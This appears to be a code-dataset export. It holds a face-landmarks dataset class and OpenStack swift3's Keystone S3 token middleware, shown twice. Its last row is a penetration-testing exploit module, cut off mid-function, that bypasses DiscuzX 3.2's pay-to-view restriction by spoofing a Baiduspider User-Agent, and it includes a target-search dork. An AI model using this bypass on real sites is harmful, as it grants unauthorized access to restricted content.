return sample
class FaceLandmarksDataset(Dataset):
def __init__(self, path, type=1, transforms=None):
self.type = type
self.transforms = transforms
image_exts = ('*.jpg', '*.png')
self.images_list = []
for ext in image_exts:
self.images_list.extend(sorted(glob.glob(os.path.join(path, ext))))
assert self.images_list, "path does not contain images"
def __len__(self):
return len(self.images_list)
def __getitem__(self, idx):
image = io.imread(self.images_list[idx])
image = color.grey2rgb(image)
filename = self.images_list[idx]
basename = os.path.splitext(filename)[0]
if self.type == 1:
landmarks = np.loadtxt(basename + '.pts', skiprows=3, comments='}')
elif self.type == 2:
landmarks = np.loadtxt(basename + '.land', skiprows=1)
elif self.type == 3:
landmarks = np.ones((68,2))
elif self.type == 4:
landmarks = np.loadtxt(basename + '.pts')
sample = {'image': image, 'landmarks': landmarks, 'filename': filename}
if self.transforms:
sample = self.transforms(sample)
return sample
| true | true |
f726125525cfe331ad2b253c9640d4eea089106b | 19,878 | py | Python | swift3/s3_token_middleware.py | AymericDu/swift3 | a64be4ed9c6657fc5471e87e08e6c7465b7bd444 | [
"Apache-2.0"
] | 10 | 2017-04-21T13:56:48.000Z | 2022-03-29T17:15:40.000Z | swift3/s3_token_middleware.py | AymericDu/swift3 | a64be4ed9c6657fc5471e87e08e6c7465b7bd444 | [
"Apache-2.0"
] | 12 | 2017-05-04T16:23:35.000Z | 2021-09-08T16:42:58.000Z | swift3/s3_token_middleware.py | AymericDu/swift3 | a64be4ed9c6657fc5471e87e08e6c7465b7bd444 | [
"Apache-2.0"
] | 10 | 2017-05-10T14:00:42.000Z | 2019-10-28T13:24:57.000Z | # Copyright 2012 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011,2012 Akira YOSHIYAMA <akirayoshiyama@gmail.com>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# This source code is based ./auth_token.py and ./ec2_token.py.
# See them for their copyright.
"""
S3 Token Middleware
This WSGI component:
* Gets a request from the swift3 middleware with an S3 Authorization
access key.
* Validates s3 token in Keystone.
* Transforms the account name to AUTH_%(tenant_name).
* Optionally can retrieve and cache secret from keystone
to validate signature locally
"""
import base64
import json
from keystoneclient.v3 import client as keystone_client
from keystoneauth1 import session as keystone_session
from keystoneauth1 import loading as keystone_loading
import requests
import httplib
import six
from six.moves import urllib
from swift.common.swob import Request, HTTPBadRequest, HTTPUnauthorized, \
HTTPException, HTTPServiceUnavailable
from swift.common.utils import config_true_value, split_path, get_logger, \
cache_from_env
from swift.common.wsgi import ConfigFileError
from swift3.utils import is_valid_ipv6
PROTOCOL_NAME = 'S3 Token Authentication'
# Headers to purge if they came from (or may have come from) the client
KEYSTONE_AUTH_HEADERS = (
'X-Identity-Status', 'X-Service-Identity-Status',
'X-Domain-Id', 'X-Service-Domain-Id',
'X-Domain-Name', 'X-Service-Domain-Name',
'X-Project-Id', 'X-Service-Project-Id',
'X-Project-Name', 'X-Service-Project-Name',
'X-Project-Domain-Id', 'X-Service-Project-Domain-Id',
'X-Project-Domain-Name', 'X-Service-Project-Domain-Name',
'X-User-Id', 'X-Service-User-Id',
'X-User-Name', 'X-Service-User-Name',
'X-User-Domain-Id', 'X-Service-User-Domain-Id',
'X-User-Domain-Name', 'X-Service-User-Domain-Name',
'X-Roles', 'X-Service-Roles',
'X-Is-Admin-Project',
'X-Service-Catalog',
# Deprecated headers, too...
'X-Tenant-Id',
'X-Tenant-Name',
'X-Tenant',
'X-User',
'X-Role',
)
def parse_v2_response(token):
    """Extract auth headers, token id, and tenant from a Keystone v2 reply.

    Returns a ``(headers, token_id, tenant)`` tuple: the WSGI headers to
    forward downstream, the token id (may be absent in the reply), and the
    tenant dict taken verbatim from the reply body.
    """
    access = token['access']
    user = access['user']
    tok = access['token']
    tenant = tok['tenant']
    headers = {
        'X-Identity-Status': 'Confirmed',
        'X-Roles': ','.join(role['name'] for role in user['roles']),
        'X-User-Id': user['id'],
        'X-User-Name': user['name'],
        'X-Tenant-Id': tenant['id'],
        'X-Tenant-Name': tenant['name'],
        'X-Project-Id': tenant['id'],
        'X-Project-Name': tenant['name'],
    }
    return headers, tok.get('id'), tenant
def parse_v3_response(token):
    """Extract auth headers and project info from a Keystone v3 reply.

    Returns ``(headers, None, project)``; no token id is parsed out of a
    v3 reply body, so the second element is always ``None``.
    """
    body = token['token']
    user = body['user']
    user_domain = user['domain']
    project = body['project']
    project_domain = project['domain']
    headers = {
        'X-Identity-Status': 'Confirmed',
        'X-Roles': ','.join(role['name'] for role in body['roles']),
        'X-User-Id': user['id'],
        'X-User-Name': user['name'],
        'X-User-Domain-Id': user_domain['id'],
        'X-User-Domain-Name': user_domain['name'],
        'X-Tenant-Id': project['id'],
        'X-Tenant-Name': project['name'],
        'X-Project-Id': project['id'],
        'X-Project-Name': project['name'],
        'X-Project-Domain-Id': project_domain['id'],
        'X-Project-Domain-Name': project_domain['name'],
    }
    return headers, None, project
class S3Token(object):
    """Middleware that handles S3 authentication."""
    def __init__(self, app, conf):
        """Common initialization code."""
        self._app = app
        self._logger = get_logger(
            conf, log_route=conf.get('log_name', 's3token'))
        self._logger.debug('Starting the %s component', PROTOCOL_NAME)
        self._timeout = float(conf.get('http_timeout', '10.0'))
        if not (0 < self._timeout <= 60):
            raise ValueError('http_timeout must be between 0 and 60 seconds')
        self._reseller_prefix = conf.get('reseller_prefix', 'AUTH_')
        self._delay_auth_decision = config_true_value(
            conf.get('delay_auth_decision'))
        # where to find the auth service (we use this to validate tokens)
        self._request_uri = conf.get('auth_uri')
        if not self._request_uri:
            # Legacy configuration path: reassemble auth_uri from the
            # deprecated auth_host/auth_port/auth_protocol options.
            self._logger.warning(
                "Use of the auth_host, auth_port, and auth_protocol "
                "configuration options was deprecated in the Newton release "
                "in favor of auth_uri. These options may be removed in a "
                "future release.")
            auth_host = conf.get('auth_host')
            if not auth_host:
                raise ConfigFileError('Either auth_uri or auth_host required')
            elif is_valid_ipv6(auth_host):
                # Note(timburke) it is an IPv6 address, so it needs to be
                # wrapped with '[]' to generate a valid IPv6 URL, based on
                # http://www.ietf.org/rfc/rfc2732.txt
                auth_host = '[%s]' % auth_host
            auth_port = int(conf.get('auth_port', 35357))
            auth_protocol = conf.get('auth_protocol', 'https')
            self._request_uri = '%s://%s:%s' % (auth_protocol, auth_host,
                                                auth_port)
        self._request_uri = self._request_uri.rstrip('/')
        # Validate the resulting URI before appending the s3tokens path.
        parsed = urllib.parse.urlsplit(self._request_uri)
        if not parsed.scheme or not parsed.hostname:
            raise ConfigFileError(
                'Invalid auth_uri; must include scheme and host')
        if parsed.scheme not in ('http', 'https'):
            raise ConfigFileError(
                'Invalid auth_uri; scheme must be http or https')
        if parsed.query or parsed.fragment or '@' in parsed.netloc:
            raise ConfigFileError('Invalid auth_uri; must not include '
                                  'username, query, or fragment')
        self._request_uri += '/v%s/s3tokens' % conf.get('auth_version', '2.0')
        self._max_attempts = 1 + int(conf.get('max_retries', 1))
        # SSL
        insecure = config_true_value(conf.get('insecure'))
        cert_file = conf.get('certfile')
        key_file = conf.get('keyfile')
        if insecure:
            self._verify = False
        elif cert_file and key_file:
            self._verify = (cert_file, key_file)
        elif cert_file:
            self._verify = cert_file
        else:
            self._verify = None
        self.session = requests.Session()
        # Optional local-signature-validation cache: when enabled, the EC2
        # secret is fetched from Keystone and cached in memcache so later
        # requests can be checked without a round trip.
        self._secret_cache_duration = int(conf.get('secret_cache_duration', 0))
        if self._secret_cache_duration > 0:
            try:
                auth_plugin = keystone_loading.get_plugin_loader(
                    conf.get('auth_type'))
                available_auth_options = auth_plugin.get_options()
                auth_options = {}
                for option in available_auth_options:
                    name = option.name.replace('-', '_')
                    value = conf.get(name)
                    if value:
                        auth_options[name] = value
                auth = auth_plugin.load_from_options(**auth_options)
                session = keystone_session.Session(auth=auth)
                self.keystoneclient = keystone_client.Client(session=session)
                self._logger.info("Caching s3tokens for %s seconds",
                                  self._secret_cache_duration)
            except Exception:
                # Best-effort: fall back to per-request validation if the
                # keystone auth plugin cannot be loaded.
                self._logger.warning("Unable to load keystone auth_plugin. "
                                     "Secret caching will be unavailable.",
                                     exc_info=True)
                self.keystoneclient = None
                self._secret_cache_duration = 0
    def _deny_request(self, code):
        """Build a swob error response (S3-style XML body) for *code*."""
        error_cls, message = {
            'AccessDenied': (HTTPUnauthorized, 'Access denied'),
            'InvalidURI': (HTTPBadRequest,
                           'Could not parse the specified URI'),
            'ServiceUnavailable': (HTTPServiceUnavailable,
                                   'Service unavailable'),
        }[code]
        resp = error_cls(content_type='text/xml')
        error_msg = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
                     '<Error>\r\n <Code>%s</Code>\r\n '
                     '<Message>%s</Message>\r\n</Error>\r\n' %
                     (code, message))
        if six.PY3:
            error_msg = error_msg.encode()
        resp.body = error_msg
        return resp
    def _json_request(self, creds_json, tx_id):
        """POST the S3 credentials to Keystone's s3tokens endpoint.

        Retries (up to self._max_attempts) on BadStatusLine and 5xx
        replies; raises the swob response from _deny_request on failure.
        """
        headers = {
            'Content-Type': 'application/json',
            'X-Trans-Id': tx_id
        }
        for attempt in range(self._max_attempts):
            try:
                response = self.session.post(
                    self._request_uri, headers=headers,
                    data=creds_json, verify=self._verify,
                    timeout=self._timeout)
            except requests.exceptions.Timeout as e:
                self._logger.info('HTTP timeout: %s', e)
                raise self._deny_request('ServiceUnavailable')
            except httplib.BadStatusLine as e:
                # See https://github.com/requests/requests/issues/2364
                self._logger.warning('HTTP request raised %s', e)
                if attempt + 1 >= self._max_attempts:
                    raise self._deny_request('ServiceUnavailable')
                self._logger.warning('retrying (%d/%d)',
                                     attempt + 1, self._max_attempts - 1)
                continue
            except requests.exceptions.RequestException as e:
                self._logger.warning('HTTP connection exception: %s', e)
                # Sometimes, we don't get httplib.BadStatusLine,
                # but a RequestException with a nested ProtocolError
                # with BadStatusLine as message.
                if 'BadStatusLine' in str(e) and \
                        attempt + 1 < self._max_attempts:
                    self._logger.warning('retrying (%d/%d)',
                                         attempt + 1, self._max_attempts - 1)
                    continue
                raise self._deny_request('InvalidURI')
            if response.status_code >= 500:
                self._logger.warning(
                    'Keystone reply error: status=%s reason=%s',
                    response.status_code, response.reason)
                if attempt + 1 >= self._max_attempts:
                    raise self._deny_request('ServiceUnavailable')
                self._logger.warning('retrying (%d/%d)',
                                     attempt + 1, self._max_attempts - 1)
                continue
            elif response.status_code < 200 or response.status_code >= 300:
                # 4xx from Keystone means the credentials were rejected.
                self._logger.debug('Keystone reply error: status=%s reason=%s',
                                   response.status_code, response.reason)
                raise self._deny_request('AccessDenied')
            break
        return response
    def __call__(self, environ, start_response):
        """Handle incoming request. authenticate and send downstream."""
        req = Request(environ)
        self._logger.debug('Calling S3Token middleware.')
        # Always drop auth headers if we're first in the pipeline
        if 'keystone.token_info' not in req.environ:
            req.headers.update({h: None for h in KEYSTONE_AUTH_HEADERS})
        try:
            parts = split_path(req.path, 1, 4, True)
            version, account, container, obj = parts
        except ValueError:
            msg = 'Not a path query: %s, skipping.' % req.path
            self._logger.debug(msg)
            return self._app(environ, start_response)
        # Read request signature and access id.
        s3_auth_details = req.environ.get('swift3.auth_details')
        if not s3_auth_details:
            # NOTE(review): "deatils" is a typo in this log message; fixing
            # it would change a runtime string, so it is left as-is here.
            msg = 'No authorization deatils from Swift3. skipping.'
            self._logger.debug(msg)
            return self._app(environ, start_response)
        access = s3_auth_details['access_key']
        if isinstance(access, six.binary_type):
            access = access.decode('utf-8')
        signature = s3_auth_details['signature']
        if isinstance(signature, six.binary_type):
            signature = signature.decode('utf-8')
        string_to_sign = s3_auth_details['string_to_sign']
        if isinstance(string_to_sign, six.text_type):
            string_to_sign = string_to_sign.encode('utf-8')
        # NOTE(review): urlsafe_b64encode returns bytes, and bytes.encode()
        # only exists on Python 2 (where bytes is str); under Python 3 this
        # line would raise AttributeError — confirm the intended interpreter
        # (the httplib import at the top of this file suggests Python 2).
        token = base64.urlsafe_b64encode(string_to_sign).encode('ascii')
        # NOTE(chmou): This is to handle the special case with nova
        # when we have the option s3_affix_tenant. We will force it to
        # connect to another account than the one
        # authenticated. Before people start getting worried about
        # security, I should point that we are connecting with
        # username/token specified by the user but instead of
        # connecting to its own account we will force it to go to an
        # another account. In a normal scenario if that user don't
        # have the reseller right it will just fail but since the
        # reseller account can connect to every account it is allowed
        # by the swift_auth middleware.
        force_tenant = None
        if ':' in access:
            access, force_tenant = access.split(':')
        # Authenticate request.
        creds = {'credentials': {'access': access,
                                 'token': token,
                                 'signature': signature}}
        # Only touch memcache when secret caching is enabled.
        memcache_client = None
        memcache_token_key = 's3secret/%s' % access
        if self._secret_cache_duration > 0:
            memcache_client = cache_from_env(environ)
        cached_auth_data = None
        if memcache_client:
            cached_auth_data = memcache_client.get(memcache_token_key)
            if cached_auth_data:
                headers, token_id, tenant, secret = cached_auth_data
                if six.PY2 and isinstance(secret, six.text_type):
                    secret = secret.encode('utf-8')
                # Validate the request signature locally with the cached
                # secret; on mismatch fall through to a Keystone round trip.
                if s3_auth_details['check_signature'](secret):
                    self._logger.debug("Cached creds valid")
                else:
                    self._logger.debug("Cached creds invalid")
                    cached_auth_data = None
        if not cached_auth_data:
            creds_json = json.dumps(creds)
            self._logger.debug('Connecting to Keystone sending this JSON: %s',
                               creds_json)
            # NOTE(vish): We could save a call to keystone by having
            #             keystone return token, tenant, user, and roles
            #             from this call.
            #
            # NOTE(chmou): We still have the same problem we would need to
            #              change token_auth to detect if we already
            #              identified and not doing a second query and just
            #              pass it through to swiftauth in this case.
            try:
                # NB: requests.Response, not swob.Response
                tx_id = environ.get('swift.trans_id', 'UNKNOWN')
                resp = self._json_request(creds_json, tx_id)
            except HTTPException as e_resp:
                if self._delay_auth_decision:
                    msg = ('Received error, deferring rejection based on '
                           'error: %s')
                    self._logger.debug(msg, e_resp.status)
                    return self._app(environ, start_response)
                else:
                    msg = 'Received error, rejecting request with error: %s'
                    self._logger.debug(msg, e_resp.status)
                    # NB: swob.Response, not requests.Response
                    return e_resp(environ, start_response)
            self._logger.debug('Keystone Reply: Status: %d, Output: %s',
                               resp.status_code, resp.content)
            try:
                token = resp.json()
                # The reply shape tells us which Keystone API answered.
                if 'access' in token:
                    headers, token_id, tenant = parse_v2_response(token)
                elif 'token' in token:
                    headers, token_id, tenant = parse_v3_response(token)
                else:
                    raise ValueError
                if memcache_client:
                    user_id = headers.get('X-User-Id')
                    if not user_id:
                        raise ValueError
                    # Fetch the EC2 secret so future requests can be
                    # signature-checked locally; failure here is non-fatal.
                    try:
                        cred_ref = self.keystoneclient.ec2.get(
                            user_id=user_id,
                            access=access)
                        memcache_client.set(
                            memcache_token_key,
                            (headers, token_id, tenant, cred_ref.secret),
                            time=self._secret_cache_duration)
                        self._logger.debug("Cached keystone credentials")
                    except Exception:
                        self._logger.warning("Unable to cache secret",
                                             exc_info=True)
                # Populate the environment similar to auth_token,
                # so we don't have to contact Keystone again.
                #
                # Note that although the strings are unicode following json
                # deserialization, Swift's HeaderEnvironProxy handles ensuring
                # they're stored as native strings
                req.environ['keystone.token_info'] = token
            except (ValueError, KeyError, TypeError):
                if self._delay_auth_decision:
                    error = ('Error on keystone reply: %d %s - '
                             'deferring rejection downstream')
                    self._logger.debug(error, resp.status_code, resp.content)
                    return self._app(environ, start_response)
                else:
                    error = ('Error on keystone reply: %d %s - '
                             'rejecting request')
                    self._logger.debug(error, resp.status_code, resp.content)
                    return self._deny_request('InvalidURI')(
                        environ, start_response)
        req.headers.update(headers)
        req.headers['X-Auth-Token'] = token_id
        # Rewrite the account segment of the path to the reseller-prefixed
        # tenant (AUTH_<tenant> by default), honoring the forced tenant.
        tenant_to_connect = force_tenant or tenant['id']
        if six.PY2 and isinstance(tenant_to_connect, six.text_type):
            tenant_to_connect = tenant_to_connect.encode('utf-8')
        self._logger.debug('Connecting with tenant: %s', tenant_to_connect)
        new_tenant_name = '%s%s' % (self._reseller_prefix, tenant_to_connect)
        environ['PATH_INFO'] = environ['PATH_INFO'].replace(account,
                                                            new_tenant_name)
        return self._app(environ, start_response)
def filter_factory(global_conf, **local_conf):
    """Create the paste.deploy filter entry point for the S3Token middleware.

    Local (per-filter) settings override the global paste configuration.
    """
    settings = dict(global_conf)
    settings.update(local_conf)
    def auth_filter(app):
        return S3Token(app, settings)
    return auth_filter
| 43.784141 | 79 | 0.574203 |
import base64
import json
from keystoneclient.v3 import client as keystone_client
from keystoneauth1 import session as keystone_session
from keystoneauth1 import loading as keystone_loading
import requests
import httplib
import six
from six.moves import urllib
from swift.common.swob import Request, HTTPBadRequest, HTTPUnauthorized, \
HTTPException, HTTPServiceUnavailable
from swift.common.utils import config_true_value, split_path, get_logger, \
cache_from_env
from swift.common.wsgi import ConfigFileError
from swift3.utils import is_valid_ipv6
PROTOCOL_NAME = 'S3 Token Authentication'
KEYSTONE_AUTH_HEADERS = (
'X-Identity-Status', 'X-Service-Identity-Status',
'X-Domain-Id', 'X-Service-Domain-Id',
'X-Domain-Name', 'X-Service-Domain-Name',
'X-Project-Id', 'X-Service-Project-Id',
'X-Project-Name', 'X-Service-Project-Name',
'X-Project-Domain-Id', 'X-Service-Project-Domain-Id',
'X-Project-Domain-Name', 'X-Service-Project-Domain-Name',
'X-User-Id', 'X-Service-User-Id',
'X-User-Name', 'X-Service-User-Name',
'X-User-Domain-Id', 'X-Service-User-Domain-Id',
'X-User-Domain-Name', 'X-Service-User-Domain-Name',
'X-Roles', 'X-Service-Roles',
'X-Is-Admin-Project',
'X-Service-Catalog',
'X-Tenant-Id',
'X-Tenant-Name',
'X-Tenant',
'X-User',
'X-Role',
)
def parse_v2_response(token):
access_info = token['access']
headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': ','.join(r['name']
for r in access_info['user']['roles']),
'X-User-Id': access_info['user']['id'],
'X-User-Name': access_info['user']['name'],
'X-Tenant-Id': access_info['token']['tenant']['id'],
'X-Tenant-Name': access_info['token']['tenant']['name'],
'X-Project-Id': access_info['token']['tenant']['id'],
'X-Project-Name': access_info['token']['tenant']['name'],
}
return (
headers,
access_info['token'].get('id'),
access_info['token']['tenant'])
def parse_v3_response(token):
token = token['token']
headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': ','.join(r['name']
for r in token['roles']),
'X-User-Id': token['user']['id'],
'X-User-Name': token['user']['name'],
'X-User-Domain-Id': token['user']['domain']['id'],
'X-User-Domain-Name': token['user']['domain']['name'],
'X-Tenant-Id': token['project']['id'],
'X-Tenant-Name': token['project']['name'],
'X-Project-Id': token['project']['id'],
'X-Project-Name': token['project']['name'],
'X-Project-Domain-Id': token['project']['domain']['id'],
'X-Project-Domain-Name': token['project']['domain']['name'],
}
return headers, None, token['project']
class S3Token(object):
def __init__(self, app, conf):
self._app = app
self._logger = get_logger(
conf, log_route=conf.get('log_name', 's3token'))
self._logger.debug('Starting the %s component', PROTOCOL_NAME)
self._timeout = float(conf.get('http_timeout', '10.0'))
if not (0 < self._timeout <= 60):
raise ValueError('http_timeout must be between 0 and 60 seconds')
self._reseller_prefix = conf.get('reseller_prefix', 'AUTH_')
self._delay_auth_decision = config_true_value(
conf.get('delay_auth_decision'))
self._request_uri = conf.get('auth_uri')
if not self._request_uri:
self._logger.warning(
"Use of the auth_host, auth_port, and auth_protocol "
"configuration options was deprecated in the Newton release "
"in favor of auth_uri. These options may be removed in a "
"future release.")
auth_host = conf.get('auth_host')
if not auth_host:
raise ConfigFileError('Either auth_uri or auth_host required')
elif is_valid_ipv6(auth_host):
auth_host = '[%s]' % auth_host
auth_port = int(conf.get('auth_port', 35357))
auth_protocol = conf.get('auth_protocol', 'https')
self._request_uri = '%s://%s:%s' % (auth_protocol, auth_host,
auth_port)
self._request_uri = self._request_uri.rstrip('/')
parsed = urllib.parse.urlsplit(self._request_uri)
if not parsed.scheme or not parsed.hostname:
raise ConfigFileError(
'Invalid auth_uri; must include scheme and host')
if parsed.scheme not in ('http', 'https'):
raise ConfigFileError(
'Invalid auth_uri; scheme must be http or https')
if parsed.query or parsed.fragment or '@' in parsed.netloc:
raise ConfigFileError('Invalid auth_uri; must not include '
'username, query, or fragment')
self._request_uri += '/v%s/s3tokens' % conf.get('auth_version', '2.0')
self._max_attempts = 1 + int(conf.get('max_retries', 1))
insecure = config_true_value(conf.get('insecure'))
cert_file = conf.get('certfile')
key_file = conf.get('keyfile')
if insecure:
self._verify = False
elif cert_file and key_file:
self._verify = (cert_file, key_file)
elif cert_file:
self._verify = cert_file
else:
self._verify = None
self.session = requests.Session()
self._secret_cache_duration = int(conf.get('secret_cache_duration', 0))
if self._secret_cache_duration > 0:
try:
auth_plugin = keystone_loading.get_plugin_loader(
conf.get('auth_type'))
available_auth_options = auth_plugin.get_options()
auth_options = {}
for option in available_auth_options:
name = option.name.replace('-', '_')
value = conf.get(name)
if value:
auth_options[name] = value
auth = auth_plugin.load_from_options(**auth_options)
session = keystone_session.Session(auth=auth)
self.keystoneclient = keystone_client.Client(session=session)
self._logger.info("Caching s3tokens for %s seconds",
self._secret_cache_duration)
except Exception:
self._logger.warning("Unable to load keystone auth_plugin. "
"Secret caching will be unavailable.",
exc_info=True)
self.keystoneclient = None
self._secret_cache_duration = 0
def _deny_request(self, code):
error_cls, message = {
'AccessDenied': (HTTPUnauthorized, 'Access denied'),
'InvalidURI': (HTTPBadRequest,
'Could not parse the specified URI'),
'ServiceUnavailable': (HTTPServiceUnavailable,
'Service unavailable'),
}[code]
resp = error_cls(content_type='text/xml')
error_msg = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<Error>\r\n <Code>%s</Code>\r\n '
'<Message>%s</Message>\r\n</Error>\r\n' %
(code, message))
if six.PY3:
error_msg = error_msg.encode()
resp.body = error_msg
return resp
def _json_request(self, creds_json, tx_id):
headers = {
'Content-Type': 'application/json',
'X-Trans-Id': tx_id
}
for attempt in range(self._max_attempts):
try:
response = self.session.post(
self._request_uri, headers=headers,
data=creds_json, verify=self._verify,
timeout=self._timeout)
except requests.exceptions.Timeout as e:
self._logger.info('HTTP timeout: %s', e)
raise self._deny_request('ServiceUnavailable')
except httplib.BadStatusLine as e:
self._logger.warning('HTTP request raised %s', e)
if attempt + 1 >= self._max_attempts:
raise self._deny_request('ServiceUnavailable')
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
except requests.exceptions.RequestException as e:
self._logger.warning('HTTP connection exception: %s', e)
# but a RequestException with a nested ProtocolError
# with BadStatusLine as message.
if 'BadStatusLine' in str(e) and \
attempt + 1 < self._max_attempts:
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
raise self._deny_request('InvalidURI')
if response.status_code >= 500:
self._logger.warning(
'Keystone reply error: status=%s reason=%s',
response.status_code, response.reason)
if attempt + 1 >= self._max_attempts:
raise self._deny_request('ServiceUnavailable')
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
elif response.status_code < 200 or response.status_code >= 300:
self._logger.debug('Keystone reply error: status=%s reason=%s',
response.status_code, response.reason)
raise self._deny_request('AccessDenied')
break
return response
def __call__(self, environ, start_response):
req = Request(environ)
self._logger.debug('Calling S3Token middleware.')
# Always drop auth headers if we're first in the pipeline
if 'keystone.token_info' not in req.environ:
req.headers.update({h: None for h in KEYSTONE_AUTH_HEADERS})
try:
parts = split_path(req.path, 1, 4, True)
version, account, container, obj = parts
except ValueError:
msg = 'Not a path query: %s, skipping.' % req.path
self._logger.debug(msg)
return self._app(environ, start_response)
s3_auth_details = req.environ.get('swift3.auth_details')
if not s3_auth_details:
msg = 'No authorization deatils from Swift3. skipping.'
self._logger.debug(msg)
return self._app(environ, start_response)
access = s3_auth_details['access_key']
if isinstance(access, six.binary_type):
access = access.decode('utf-8')
signature = s3_auth_details['signature']
if isinstance(signature, six.binary_type):
signature = signature.decode('utf-8')
string_to_sign = s3_auth_details['string_to_sign']
if isinstance(string_to_sign, six.text_type):
string_to_sign = string_to_sign.encode('utf-8')
token = base64.urlsafe_b64encode(string_to_sign).encode('ascii')
# have the reseller right it will just fail but since the
# reseller account can connect to every account it is allowed
# by the swift_auth middleware.
force_tenant = None
if ':' in access:
access, force_tenant = access.split(':')
# Authenticate request.
creds = {'credentials': {'access': access,
'token': token,
'signature': signature}}
memcache_client = None
memcache_token_key = 's3secret/%s' % access
if self._secret_cache_duration > 0:
memcache_client = cache_from_env(environ)
cached_auth_data = None
if memcache_client:
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
headers, token_id, tenant, secret = cached_auth_data
if six.PY2 and isinstance(secret, six.text_type):
secret = secret.encode('utf-8')
if s3_auth_details['check_signature'](secret):
self._logger.debug("Cached creds valid")
else:
self._logger.debug("Cached creds invalid")
cached_auth_data = None
if not cached_auth_data:
creds_json = json.dumps(creds)
self._logger.debug('Connecting to Keystone sending this JSON: %s',
creds_json)
# NOTE(vish): We could save a call to keystone by having
# keystone return token, tenant, user, and roles
# from this call.
#
# NOTE(chmou): We still have the same problem we would need to
# change token_auth to detect if we already
# identified and not doing a second query and just
# pass it through to swiftauth in this case.
try:
# NB: requests.Response, not swob.Response
tx_id = environ.get('swift.trans_id', 'UNKNOWN')
resp = self._json_request(creds_json, tx_id)
except HTTPException as e_resp:
if self._delay_auth_decision:
msg = ('Received error, deferring rejection based on '
'error: %s')
self._logger.debug(msg, e_resp.status)
return self._app(environ, start_response)
else:
msg = 'Received error, rejecting request with error: %s'
self._logger.debug(msg, e_resp.status)
# NB: swob.Response, not requests.Response
return e_resp(environ, start_response)
self._logger.debug('Keystone Reply: Status: %d, Output: %s',
resp.status_code, resp.content)
try:
token = resp.json()
if 'access' in token:
headers, token_id, tenant = parse_v2_response(token)
elif 'token' in token:
headers, token_id, tenant = parse_v3_response(token)
else:
raise ValueError
if memcache_client:
user_id = headers.get('X-User-Id')
if not user_id:
raise ValueError
try:
cred_ref = self.keystoneclient.ec2.get(
user_id=user_id,
access=access)
memcache_client.set(
memcache_token_key,
(headers, token_id, tenant, cred_ref.secret),
time=self._secret_cache_duration)
self._logger.debug("Cached keystone credentials")
except Exception:
self._logger.warning("Unable to cache secret",
exc_info=True)
# Populate the environment similar to auth_token,
# so we don't have to contact Keystone again.
# they're stored as native strings
req.environ['keystone.token_info'] = token
except (ValueError, KeyError, TypeError):
if self._delay_auth_decision:
error = ('Error on keystone reply: %d %s - '
'deferring rejection downstream')
self._logger.debug(error, resp.status_code, resp.content)
return self._app(environ, start_response)
else:
error = ('Error on keystone reply: %d %s - '
'rejecting request')
self._logger.debug(error, resp.status_code, resp.content)
return self._deny_request('InvalidURI')(
environ, start_response)
req.headers.update(headers)
req.headers['X-Auth-Token'] = token_id
tenant_to_connect = force_tenant or tenant['id']
if six.PY2 and isinstance(tenant_to_connect, six.text_type):
tenant_to_connect = tenant_to_connect.encode('utf-8')
self._logger.debug('Connecting with tenant: %s', tenant_to_connect)
new_tenant_name = '%s%s' % (self._reseller_prefix, tenant_to_connect)
environ['PATH_INFO'] = environ['PATH_INFO'].replace(account,
new_tenant_name)
return self._app(environ, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return S3Token(app, conf)
return auth_filter
| true | true |
f726129b2b4b6cf86775da7c613d9ac7bd8cbcd9 | 1,396 | py | Python | exploit/cms_discuzx_3_2_authority_bypass.py | Micr067/pentestdb | 6aa06e1406589567d51ab63a88bfe47416e906e9 | [
"Apache-2.0"
] | 686 | 2016-02-06T15:11:12.000Z | 2022-03-30T10:55:29.000Z | exploit/cms_discuzx_3_2_authority_bypass.py | WinDyXuu/pentestdb | 6aa06e1406589567d51ab63a88bfe47416e906e9 | [
"Apache-2.0"
] | 6 | 2016-08-14T15:13:31.000Z | 2020-03-03T14:01:28.000Z | exploit/cms_discuzx_3_2_authority_bypass.py | WinDyXuu/pentestdb | 6aa06e1406589567d51ab63a88bfe47416e906e9 | [
"Apache-2.0"
] | 284 | 2015-12-19T07:42:05.000Z | 2022-03-13T11:58:38.000Z | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzAB(Exploit):
    # Exploit metadata consumed by the pentest framework; the Chinese
    # strings below are runtime values (displayed to the user) and are
    # therefore left untranslated.
    expName = u"DiscuzX 3.2绕过虚拟币支付查看内容"
    version = "1.0"
    author = "alpha1e0"
    language = "php"
    appName = "discuz"
    appVersion = "x3.2"
    reference = ['http://www.secpulse.com/archives/33393.html','http://www.wooyun.org/bugs/wooyun-2010-099659']
    description = u'''
    漏洞利用条件:1.DiscuzX 3.2;2.没有其他权限设置
    gh: inurl:forum.php "金币 才能浏览"
    '''
    def _verify(self):
        """Check whether the paywalled content is exposed to a spoofed
        search-engine crawler.

        Fetches self.url twice — once normally and once with a Baiduspider
        User-Agent — and reports a finding when the paywall marker string
        appears only in the normal response.
        """
        result = Result(self)
        # Paywall marker text shown on gated posts ("...to view").
        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        #userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
        headers = {'User-Agent':userAgent}
        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)
